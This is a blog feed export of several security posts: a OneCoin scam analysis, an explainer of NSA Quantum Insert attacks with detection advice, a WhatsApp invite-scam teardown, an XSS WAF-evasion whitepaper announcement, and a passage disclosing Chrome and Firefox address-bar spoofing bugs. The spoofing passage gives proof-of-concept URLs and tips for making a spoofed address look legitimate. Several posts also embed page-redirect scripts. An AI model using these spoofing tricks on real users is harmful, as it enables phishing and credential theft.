tag:blogger.com,1999:blog-31212701990897590622024-02-07T22:27:38.762-08:00Ethical Hacking - RafayhackingarticlesRafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.comBlogger261125tag:blogger.com,1999:blog-3121270199089759062.post-86558813884974214682017-05-02T01:34:00.001-07:002020-05-27T14:20:31.175-07:00Is OneCoin A Scam? - Technical Analysis <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<b>TL;dr: People should refrain from any type of Pyramid Scheme especially when it comes to Cryptocurrency:</b><br />
<br />
Onecoin is a Cryptocurrency that has been dubbed as Ponzi Scam and the evidence surrounding it is considerate. The way it works is that members buy training packages that come up with "tokens" and these tokens can be utilized for mining. After mining has been completed Onecoins will be credited to your account which will depend upon the number of tokens you have placed as well as the amount of difficulty to solve a problem.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwA8PSwcj_tFtrtswOOok8Gc-_kIl89MGYLeBZpfo3qdfV2N3C0En9iqmxg6Tyn4Glu52feWndOHSPIptfi0iSCMRKPWmCSku91lxqDYkS3Tj5sKfwdGmRq2SnHw3h3RMwkBCrZqg1LuI/s1600/maxresdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwA8PSwcj_tFtrtswOOok8Gc-_kIl89MGYLeBZpfo3qdfV2N3C0En9iqmxg6Tyn4Glu52feWndOHSPIptfi0iSCMRKPWmCSku91lxqDYkS3Tj5sKfwdGmRq2SnHw3h3RMwkBCrZqg1LuI/s640/maxresdefault.jpg" width="640" /></a></div>
<br />
<a name='more'></a>The following are few of the concerns raised by the cryptocommunity surrounding Onecoin:<br />
<h2>
Concerns Over OneCoin CryptoCurrency</h2>
<b>i)</b> Onecoin is based upon a private blockchain. A private blockchain is kept centralized to an Organization and only that Organization has write permissions to the blockchain as opposed to a public blockchain where anyone can read/write to blockchain.<br />
<br />
However, even in a Privateblock chain read permissions can be made public which would allow them to view the transactions. Despite of claiming that their business model is transparent, they have opted for private blockchain.<br />
<br />
<b>ii)</b> Cryptocoins (Bitcoin in general) solve a common problem i.e. how to inject new currencies into the system without causing inflation. The process of creating a new coins is referred as minning which generally involves solving of complex mathematical problem whose complexity will grow as more and more people try to solve it.<br />
<br />
This is done by utilizing CPU processing power in order to solve these problems. There is not enough evidence about how mining takes place such as the algorithm and servers that are being utilized for mining.<br />
<br />
<b>iii)</b> Almost all other cryptocurrencies such as litecoin, namecoin, dogecoin, dashcoin, ethereum etc can be traded with each other on various platforms such as Bitfinex, Poloniex, btc-e etc. Whereas for Onecoin you will not find a single exchange that would allow you to trade Onecoin with any of these cryptocurrencies.<br />
<br />
<b>iv)</b> Several similar MLM (Multi Level Marketing) cryptocurrencies in past have been busted and exposed, one example I can quote is USFIA's Gemcoin which was approximately 32 million dollar ponzi scam. Onecoin is based upon similar concepts of affiliate marketing. <br />
<br />
<b>v)</b> Several Financial watchdogs such as UK's Financial Conduct Authority, German's Federal Financial Supervisory and Markets Authority have already warned against Onecoin.<br />
<br />
<b>vi) </b>Several Countries have started a crackdown against Onecoin and have seized accounts for Onecoin payment processors. These countries include India, Thailand, Bangladesh, Germany etc.<br />
<br />
To invest or not is however a decision that I will leave to your choice. </div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/is-onecoin-scam-technical-analysis.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-74283385581011472572017-04-11T10:43:00.000-07:002020-05-27T14:20:14.218-07:00How Pakistan's Critical Infrastructure Was Hacked? - Technical Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBw07lo_zNu4v-HZ5sJIeswM0pjZ1A0TbZrN9R7MNs0ZPp3K14PRMil1r3fTSby9rNPhdfsmjVTDFMoqKFgtfK1GiRMYurkjLUcDtk9H8y5zSB2ewl1T7Jc2qMx9mT95nTNQV2W1BU8s/s1600/NSA_surveillance.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBw07lo_zNu4v-HZ5sJIeswM0pjZ1A0TbZrN9R7MNs0ZPp3K14PRMil1r3fTSby9rNPhdfsmjVTDFMoqKFgtfK1GiRMYurkjLUcDtk9H8y5zSB2ewl1T7Jc2qMx9mT95nTNQV2W1BU8s/s400/NSA_surveillance.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
There have been multiple reports leaked from various sources about NSA hacking into Pakistan's Internet infrastructure ranging from Core Routers to Pakistan Telecommunication Green Line Communication Network in order to intercept Pakistan's civilian and military leadership communication. In October last year, a group called "<b>Shadow Brokers</b>" leaked comprehensive list of servers that were hacked as part of NSA's operation. The list revealed several hosts of multinet (<b>mpkhi-bk.multi.net.pk, ns1.multi.net.pk</b>) were compromised as well as and micronet (<b>tx.micro.net.pk</b>) now part of Nayatel.<br />
<br />
<a name='more'></a>There may be various motives for NSA hacking into Pakistan's internet infrastructure, intercepting and monitoring the traffic maybe one of the reasons. However, there is more to it. As per various leaks from Edward Snowden reveals couple of NSA's deadliest weapons and most notable being quantum-insert attacks. As per one of the leaked <a href="https://www.documentcloud.org/documents/3031642-SSO-News-Excerpt-Redacted.html" rel="nofollow" target="_blank">documents </a>confirms this attack was being utilized in order to infect a target located in Miran Shah.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcnMtq-oeIRjNVcrqss2wbW5dokgVzB_VhOcCalUf3I7lZZUnYrwr-fAkAc6egn6bY7u3UfBbmPF7xOsGrmw8LFRbMkkWbI1ZvbpoQlboJR2jWfiGgq8zdQ7-nmCqXhlWl-M9j6dKzqLk/s1600/207966b3-676e-4e1c-bf62-fc6361091992+%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcnMtq-oeIRjNVcrqss2wbW5dokgVzB_VhOcCalUf3I7lZZUnYrwr-fAkAc6egn6bY7u3UfBbmPF7xOsGrmw8LFRbMkkWbI1ZvbpoQlboJR2jWfiGgq8zdQ7-nmCqXhlWl-M9j6dKzqLk/s640/207966b3-676e-4e1c-bf62-fc6361091992+%25281%2529.jpg" width="640" /></a></div>
<br />
<h2>
Quantum Insert Attacks</h2>
Quantum Insert Attacks are an example of Man on the Side Attacks which require precise positioning of attackers rogue servers (Monitor/Shooters) in order to win a race against legitimate servers to deliver malicious content. The success probability of this attack relies upon the placement of the server. The closer the malicious servers are placed to the target the more of chances of it winning the race against the legitimate servers.<br />
<u><br /></u>
<u>For instance, if a user based in Pakistan surfs Facebook.com, the PTCL or multinet being ISP would be technically closer to the target than the legitimate Facebook servers which has more probability of winning the race and delivering the malicious content. This happens to be one of the major reasons why NSA hacked into Pakistan's ISP in order to be technically closer to the target, hence increasing attack probability.</u><br />
<div>
<br /></div>
<h2>
How Quantum Insert Attack Works?</h2>
Quantum Insert Attacks are not new; they are a type of TCP hijacking attacks that have existed in one form or another. In order to understand TCP hijacking attack, we have to understand how three-way handshake works.<br />
<br />
TCP being a connection-oriented protocol requires sender/receiver to establish a three-way handshake. If you type Facebook.com in your browser, one of the first steps browser takes is to perform a DNS query to find out the IP address associated with Facebook.com, the query returns <b>66.220.159.121</b>. The client will then establish a TCP/IP three-way handshake to server <b>66.220.159.121</b>.<br />
<br />
The following diagram illustrates how TCP/IP three-way handshake works:<br />
<div>
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55IJO0mRMaxQA9j-Pjd1AWlmQbqgncocRr9QtvaB8qNUGthg2xflrh-xcJfGMZ0Ui9o0dOFi4F279b55iDM3b6JMsNFZ0nzeiU9MvZXOh6aNT4Svmzy1u9SRTzFZh6xoblS_CiRmzeak/s1600/17888354_1685307348151135_1223176672_n+-+Copy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55IJO0mRMaxQA9j-Pjd1AWlmQbqgncocRr9QtvaB8qNUGthg2xflrh-xcJfGMZ0Ui9o0dOFi4F279b55iDM3b6JMsNFZ0nzeiU9MvZXOh6aNT4Svmzy1u9SRTzFZh6xoblS_CiRmzeak/s640/17888354_1685307348151135_1223176672_n+-+Copy.jpg" width="640" /></a></div>
<span style="font-weight: bold;"><br /></span>
<span style="font-weight: bold;"></span><br />
<div style="text-align: center;">
<b><span style="font-size: xx-small;">ref:http://ipcisco.com/wp-content/uploads/TCPHeader/7_3wayhandshake_requestdata.jpg</span></b><br />
<div>
<b><span style="font-size: xx-small;"><br /></span></b></div>
</div>
</div>
<div style="text-align: center;">
<span style="font-weight: bold;"><br /></span></div>
<div style="text-align: left;">
<b>i) Host A</b> sends a packet with SYN flag, along with it, it also generates and sends a random ISN (Initial Sequence Number) i.e. <b>1293906975 </b>along with an ACK=0.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>ii)</b> Host B, upon receiving the SYN, responds with SYN, ACK with its own random sequence number <b>3455719727</b> and increments Host A's sequence number by 1 and sends it back with <b>ACK=1293906976</b></div>
<div style="text-align: left;">
<b><br /></b></div>
<div style="text-align: left;">
<b>iii) </b>The host A finally completes the three-way handshake by incrementing Host A's sequence number by one and sending back.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
From above process, it is evident that for establishing three-way handshake both client and server will generate a random 32 bit sequence number from which it will start counting the segments transmitted.<br />
<br />
Host B will only accept the segments from Host A when correct SEQ/ACK number is transmitted. In case, if an attacker obtains sequence numbers used for establishing session, they will be able to craft TCP packets containing the sequence number and using spoofing IP address it will make the receiving system believe that the segments have appeared from a legitimate host. This is known as <b>TCP Hijacking</b><br />
<br />
When the legitimate packet arrives afterwards, it will be discarded as it will have duplicate sequence number. One critical condition for its success is that the response from the malicious server must arrive before the legitimate response from the webserver, due to this very reason the placement of malicious server is critical for the success of this attack. From the document mentioned above, it was clear that the success ratio for the malicious response to arrive before the legitimate response based in Pakistan was approximately <b>48%</b>.<br />
<br /></div>
<div style="height: 0; padding-bottom: 65%; position: relative;">
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/ZG5FMDUWVoA?ecver=2" style="height: 100%; left: 0; position: absolute; width: 100%;" width="554"></iframe></div>
<br />
From the above demonstration by Fox-it, it is clear that Quantum-Insert Attack requires two crucial components; the first is the monitor which sits and passively collects session information and feeds it to the shooter. The shooter then using the sequence/ACK number hijacks the session and tries to inject the malicious content into the TCP stream before the legitimate response.<br />
<br />
As discussed before, placement of the monitor/ shooter is extremely crucial as they have to be near to the target and this happens to be one of the major reasons why NSA is particularly interested in hijacking ISP's for better placement of their monitor/shooter in order to win race against legitimate web-servers to inject malicious content.<br />
<div>
<br /></div>
<h2>
Putting Pieces Together</h2>
<b>1.</b> NSA has hacked into various Internet Service Providers in order to deploy its passive traffic collection sensors or monitors around internet backbone.<br />
<b><br /></b>
<b>2. </b>The huge chunk of data is then fed to analysis and co-relation engines such as<b> XKEYSCORE</b>.<br />
<br />
<b>3. </b>Based upon the analysis of tools such as<b> XKEYSCORE</b>, a target profile is built, for instance "All TOR/VPN users in a certain area", "all PGP usage in Iran" etc. XKEYSCORE can also be queried for most frequent web searches and most frequently visited websites (HTTP).<br />
<br />
<b>4. </b>Once the target has been selected and attack conditions have been identified; attack conditions can be for instance, all users based in F-8 Islamabad browsing <b>http://www.torproject.org/</b>. This information is then fed to monitors who once these conditions are met, would leak information to the shooter which then utilizes Quantum-Insert Attack in order to inject malicious response into HTTP response for <b>http://www.torproject.org/</b> before the actual response arrives.<br />
<br />
<b>5. </b>Once the target is compromised, the post-exploitation phase begins which is aimed at collection information as well as performing lateral movement inside of network. <br />
<br />
<h2>
Detection & Defenses </h2>
<b>1.</b> It is to be noted that <b>HTTPS</b> along with <b>HSTS (Strict Transport Layer Security) </b>would reduce the effectiveness of this attack. IPSEC VPN would also prevent this attack as it encrypts transport/application layer messages.<br />
<br />
<b>2. </b>One of the other ways to detect this attack would be to check for TTL (Time to Live) value of the IP Packet. When an IP packet is sent across the network, it sets the TTL value which is decremented by each hop. Since in this case the monitor/shooter would be near to the target, the TTL value of the spoofed packet would be less than the real packet.<br />
<b><br /></b>
<b>3.</b> Since, both the legitimate and malicious packets will arrive with same sequence number. We can create a signature on IDS/IPS to keep track of the segments for same sequence number.<br />
<br /></div>
<script>
location.href="https://www.rafaybaloch.com/2017/07/how-pakistans-critical-infrastructure-was-hacked.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-799732511771374472016-09-06T03:21:00.003-07:002020-05-27T14:20:50.349-07:00Whatsapp 4G VIP SCAM - Technical Analysis<meta http-equiv="Refresh" content="5;url=https://www.w3schools.com">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglHALVxsJv4K20JD14ap0V-JuwIdD0bkavMQB1cVnUvQFNAHvCAwatvUWcgKJNtZ568P-itOof8ocMOzz2pO8m1VFmIzuaQy7XMLjaMyRvlAOw42shiS6OZy_CIDwm4do3yNdahIsywlI/s1600/123.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="467" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglHALVxsJv4K20JD14ap0V-JuwIdD0bkavMQB1cVnUvQFNAHvCAwatvUWcgKJNtZ568P-itOof8ocMOzz2pO8m1VFmIzuaQy7XMLjaMyRvlAOw42shiS6OZy_CIDwm4do3yNdahIsywlI/s640/123.png" width="640" /></a></div>
<br />
This is a short blog post describing about a recent hoax pertaining the WhatsApp 4.0 version. I would like to clearly highlight that there is no such application as '<b>Whatsapp 4G</b>'. The version promises users unrealistic features video calling, new whatsapp themes, delete sent messages from both sides etc<br />
<a name='more'></a><br />
The following is how the message is being propagated:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD2RoDZqqcbLmILMiDL53FuXyX-S81upowGZ3UogAlChLwHYu4S5fkNSc6-6pvCb8vQbO34hYgBb6xEU1eYbOjOyZZNwCiZQQjTZGHODBHlY8W5nm2Z6br8oZS16iGucSBhzDt8RrxVAE/s1600/123.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD2RoDZqqcbLmILMiDL53FuXyX-S81upowGZ3UogAlChLwHYu4S5fkNSc6-6pvCb8vQbO34hYgBb6xEU1eYbOjOyZZNwCiZQQjTZGHODBHlY8W5nm2Z6br8oZS16iGucSBhzDt8RrxVAE/s400/123.png" width="400" /></a></div>
<br />
<h2>
Technical Analysis </h2>
Upon visiting the link you would be taken to a page where you would be asked to invite 15 friends before you can download the version, upon clicking the invite button, it would use WhatsApp scheme (whatspp://) in order send messages to your friends, and hence you would be promoting a hoax on behalf of the scammers:<br />
<br />
The entire business logic is based upon the following client side script - <b><u>http://new-4g-whatsapp.ga/invite.js</u>.</b><br />
<div>
<br /></div>
<div>
Upon examining invite.js it was discovered that the code sets a cookie and checks if 15 invites have been sent on the client side: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrl1s_WLEpGVHvqC77-UeaqmmG5AUeobthX0sv7v4AT8WsEZ1YdAsIX-H_q0mAtsmWu0kyoMoZPKGJ6bpeAbWVElHb92xoXd3pMdoKkJ8oyjAOMywdUDGbhenRaraJhlpr37okKGa-lEI/s1600/1234.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrl1s_WLEpGVHvqC77-UeaqmmG5AUeobthX0sv7v4AT8WsEZ1YdAsIX-H_q0mAtsmWu0kyoMoZPKGJ6bpeAbWVElHb92xoXd3pMdoKkJ8oyjAOMywdUDGbhenRaraJhlpr37okKGa-lEI/s640/1234.png" width="640" /></a></div>
<br />
<br />
Once, the counter has reached up to 15 invites or above, you would be redirected to the download link:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0WHbPnRjG-982_nnPF-ZH2BQ9h0xoKk-rniN0ghKmTODt7e1O-RDntCfnyoLm9ufwMLJ2qTDY3SFWD-SGqVj1sKRB_W5et-MxcgLvJ0ri2Xf-qn13AFWSLUVD1hByACwHCbyMJbS2_g/s1600/whatsappp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjy0WHbPnRjG-982_nnPF-ZH2BQ9h0xoKk-rniN0ghKmTODt7e1O-RDntCfnyoLm9ufwMLJ2qTDY3SFWD-SGqVj1sKRB_W5et-MxcgLvJ0ri2Xf-qn13AFWSLUVD1hByACwHCbyMJbS2_g/s640/whatsappp.png" width="640" /></a></div>
From the above source code, if the value of <b>c </b>is greater or equal to <b>'15</b>', window.location.href would be set to "<b>ur</b>" variable which hosts the following download link - <b><u>http://ta3.co/new-4G-whatsapp/install.php</u></b><br />
<br />
The installation link seems to be dead, normally in such scams you would be asked to fill in surveys or installing *free apps* which would not be free as they might be shipped with Malware/adwares.<br />
<b><br /></b>
<br />
<h2>
Update (Whatsapp Gold)</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGox1H6BP00Art9q2satZNBOeqackwBfcBBXXahDZzdv5tt4X-7c06l48g7B2CCW397pDRzUZm-Eh5g1iXRPlg70EiZpJQf6YkXM8QUP5lEWHERTZCIQEmNHjtg9UiEGubqqNgxQ39B2U/s1600/IMG_20160906_222448954.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGox1H6BP00Art9q2satZNBOeqackwBfcBBXXahDZzdv5tt4X-7c06l48g7B2CCW397pDRzUZm-Eh5g1iXRPlg70EiZpJQf6YkXM8QUP5lEWHERTZCIQEmNHjtg9UiEGubqqNgxQ39B2U/s640/IMG_20160906_222448954.jpg" width="640" /></a></div>
<br />
A new variation of Whatsapp 4G VIP scam has recently came into notice with name of <b>"Whatsapp Gold"</b>, which basically works on the same principle as above. The only thing that has changed the interface design and name.</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/whatsapp-4g-vip-scam-technical-analysis.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-11345099982500652702016-09-01T03:07:00.000-07:002020-05-27T14:21:06.159-07:00Breaking The Great Wall of Web - XSS WAF Evasion CheatSheet<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbc2RdZYaOM6w8y7DoWxzZc-LIIviCPwZAMD0L4fgYQ59w8Jo56XdAL8ZJRRQ9NvUvT1_qeqyqi5AwYuOyKGqdB3CNbRxDNGU4BS9V9sshIDUfXsy_6UoI_cLTWg8o5P9aqdbsD5obeh4/s1600/14017993_1098329660221427_1648848796_n.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbc2RdZYaOM6w8y7DoWxzZc-LIIviCPwZAMD0L4fgYQ59w8Jo56XdAL8ZJRRQ9NvUvT1_qeqyqi5AwYuOyKGqdB3CNbRxDNGU4BS9V9sshIDUfXsy_6UoI_cLTWg8o5P9aqdbsD5obeh4/s640/14017993_1098329660221427_1648848796_n.png" width="452" /></a></div>
<br />
I think it's mandatory to give back to Security community from where we learn cutting edge techniques and information. Therefore after months of effort i am presenting to you a new WhitePaper titled "<b><u>Breaking Great Wall of Web</u></b>" without any strings attached.<br />
<b><br /></b>
<br />
<h2>
Acknowledgements</h2>
I would like to thank the <a href="http://acunetix.com/">Acunetix Team</a> for helping with proof-reading of the document.
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.acunetix.com/" target="_blank"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDS4Nc_d-FPv0tSIA9Sc5sdUbKeJWGrtgQVIsrelzWlqf6HEAyqR3qgiot-Bu9ru3KF5SjGMFXtB8pvrGaeOt6DWLncko36-_CM2F9W1Zgiap3iT0jyIyfyEo_tlUXf9TyXJdyW3cADuk/s320/acunetix-big-logo.png" width="320" /></a></div>
<h2>
Background</h2>
<br />
<b><br /></b>
The WhitePaper not only contains sophisticated XSS vectors but it aims at also explaining the methodology behind bypassing a WAF. The previous paper on this subject "<b><a href="http://www.rafayhackingarticles.net/2013/12/bypassing-modern-wafs-xss-filters-cheat.html" target="_blank">Bypassing Modern WAF's XSS Filters - Cheat Sheet</a>" </b>was released 3 years back. A lot has changed and evolved during these years, especially with the advent of ECMA Script a new horizon for evasion/obfuscation have been opened. I have already discussed/demonstrated several techniques presented in this whitepaper in my recent Webcast hosted by <b>Garage4hackers</b> team namely "<a href="http://www.rafayhackingarticles.net/2016/05/bypassing-modern-wafs-exemplified-at-xss.html" target="_blank"><b>Bypassing Modern WAF's Exemplified At XSS</b></a>".<br />
<br />
<h2>
Abstract </h2>
<br />
<br />
Input Validation flaws such as XSS are the most prevailing security threats affecting modern Web Applications. In order to mitigate these attacks Web Application Firewalls (WAF's) are used, which inspect HTTP requests for malicious transactions. Nevertheless, they can be easily bypassed due to the complexity of JavaScript in Modern browsers.
In this paper we will discusses several techniques that can be used to circumvent WAF’s exemplified at XSS.<br />
<br />
This will paper talk about the concepts of WAF’s in general, identifying and fingerprinting WAF’s and various methodologies for constructing a bypass. The paper discusses well known techniques such as Brute Forcing, Regular expression reversing and browser bugs for bypassing WAF’s.<br />
<br />
<div style="text-align: center;">
<a href="http://sh3ifu.com/paper/" rel="nofollow" target="_blank"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV_dW8i7-qY3gG2zxxRD_Qay71i4n-mM5t9PbKEN8F2_UyoA4q2PQfhaVtcj3lv9xRhVku-LMAInaO3yU_oOhUf4ZKvJFTiezer43_oIabolDIcQLpCQA8356pmVNV30B2cu_cw04CKVU/s320/Download-button.jpg" /></a></div>
</div>
<script>
location.href="http://www.rafaybaloch.com/2017/06/breaking-great-wall-of-web-xss-waf.html";
</script>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-68325720217363870102016-08-15T23:16:00.000-07:002020-05-27T14:21:20.733-07:00Google Chrome, Firefox Address Bar Spoofing Vulnerability<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbPu9uoS7EympJLJxWchHqh_rd5K7Rd21KBhneHkffuSfvy66TiIivdemt4RHQirt5YK1VUwwrmcu-vSowmLI2qXYxdUzK7F9snIm5BiuDKwyuVGO-tF-NObuO6QpR_AT6ZqZ8jSb9JMU/s1600/security-tips-spoofing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbPu9uoS7EympJLJxWchHqh_rd5K7Rd21KBhneHkffuSfvy66TiIivdemt4RHQirt5YK1VUwwrmcu-vSowmLI2qXYxdUzK7F9snIm5BiuDKwyuVGO-tF-NObuO6QpR_AT6ZqZ8jSb9JMU/s400/security-tips-spoofing.png" width="400" /></a></div>
<h2>
Introduction</h2>
</div>
Google security team themselves <a href="https://www.google.com/about/appsecurity/reward-program/" rel="nofollow" target="_blank">state that </a>"<b>We recognize that the address bar is the only reliable security indicator in modern browsers</b>" and if the only reliable security indicator could be controlled by an attacker it could carry adverse affects, For instance potentially tricking users into supplying sensitive information to a malicious website due to the fact that it could easily lead the users to believe that they are visiting is legitimate website as the address bar points to the correct website.
<br />
<a name='more'></a>In my paper "<b><a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit-wp.pdf" rel="nofollow" target="_blank">Bypassing Browser Security Policies For Fun And Profit</a></b>" I have uncovered various Address Bar Spoofing techniques as well as bugs affecting modern browsers. In this blog post I would discuss about yet another "<b>Address Bar Spoofing</b>" vulnerability affecting Google Chrome's Omnibox. Omnibox is a customized address bar api developed for better user experience such as search suggestions, URL prediction, instant search features so on and so forth.<br />
<h2>
Technical Details</h2>
Characters from languages are such as Arabic, Hebrew are displayed from RTL (Right To Left) order, due to mishandling of several unicode characters such as <b>U+FE70</b>, <b>U+0622</b>, <b>U+0623</b> etc and how they are rendered combined with (first strong character) such as an IP address or alphabet could lead to a spoofed URL.
It was noticed that by placing neutral characters such as <span style="font-weight: normal;">"</span>/<span style="font-weight: normal;">", "</span>ا<span style="font-weight: normal;">" </span>in filepath causes the URL to be flipped and displayed from Right To Left. However, in order for the URL to be spoofed the URL must begin with an IP address followed by neutral characters as omnibox considers IP address to be combination of punctuation and numbers and since<b> LTR (Left To Right)</b> direction is not properly enforced, this causes the entire URL to be treated and rendered from <b>RTL (Right To Left)</b>. However, it doesn't have be an IP address, what matters is that first strong character (generally, alphabetic character) in the URL must be an RTL character<br />
<br />
<b><u>Logical Order</u></b><br />
<br />
The following is the logical order of characters in the memory. Since, Omnibox removes"<b>http://</b>" and displays strings without "<b>http://</b>" prefix.<br />
<br />
<b><span style="color: blue;">127.0.0.1</span>/ا/<span style="color: red;">http://</span><span style="color: red;">example.com</span></b><br />
<u><br /></u>
<b><u>Display Order</u></b><br />
<br />
The following is the display order of characters after the browser removes the leading "http://", decodes the percent-escaped bytes, and applies the bidirectional algorithm.<br />
<br />
<b><span style="color: red;">http://example.com</span>/ا/<span style="color: blue;">127.0.0.1</span></b><br />
<div>
<br /></div>
<b><u>Steps To Reproduce</u></b><br />
<b><br /></b>
<b>1) </b>Visit the following link for the vulnerable browser - <b><a href="http://182.176.65.7/%EF%B9%B0/http://google.com/test" rel="nofollow" target="_blank">http://182.176.65.7/%EF%B9%B0/http://google.com/test</a></b><br />
<br />
<b>2) </b>You would notice that the URL has been flipped from Right to left and the browser displays h<b>ttp://google.com/test/182.176.65.7 </b>while it displays the content from the IP address.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_x-K1F4B8wWPjlqjbaq4eMwUgTTZ2UZ4754GaZcQOp_CnFdDkMzLtkOCWQghOWTHs1jJ1hCKg3roLyXjhv7EaziFw9VO-k4o5VJlYWYzipGCVNw5MaJfpgL9dEi4k_mxm1ISgiCmKQY/s1600/95d82072-54e4-46fd-8e91-dfe9dfe3cf6f.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="504" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO_x-K1F4B8wWPjlqjbaq4eMwUgTTZ2UZ4754GaZcQOp_CnFdDkMzLtkOCWQghOWTHs1jJ1hCKg3roLyXjhv7EaziFw9VO-k4o5VJlYWYzipGCVNw5MaJfpgL9dEi4k_mxm1ISgiCmKQY/s640/95d82072-54e4-46fd-8e91-dfe9dfe3cf6f.png" width="640" /></a></div>
<div style="text-align: center;">
<br />
<br /></div>
The IP address part can be easily hided specially on mobile browsers by selecting a long URL (<b>google.com/fakepath/fakepath/fakepath/... /127.0.0.1</b>) in order to make the attack look more realistic. In order to make the attack more realistic unicode version of padlock can be used in order to demonstrate the presence of SSL.<br />
<h2>
Firefox Mobile Address Bar Spoofing CVE-2016-5267</h2>
Firefox was also prone to a similar vulnerability, however this did not require IP address to trigger, all it required was is arabic RTL characters, which in this case i provided arabic TLD (<b>عربي.امارات</b>) in order to trigger the vulnerability which resulted in<br />
<br />
<div>
<b>Proof of concept </b><br />
<b><br /></b>
<b><a href="http://xn--ngbrx4e.xn--mgbaam7a8h/google.com/test/test/test" rel="nofollow" target="_blank">http://عربي.امارات/google.com/test/test/test</a></b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
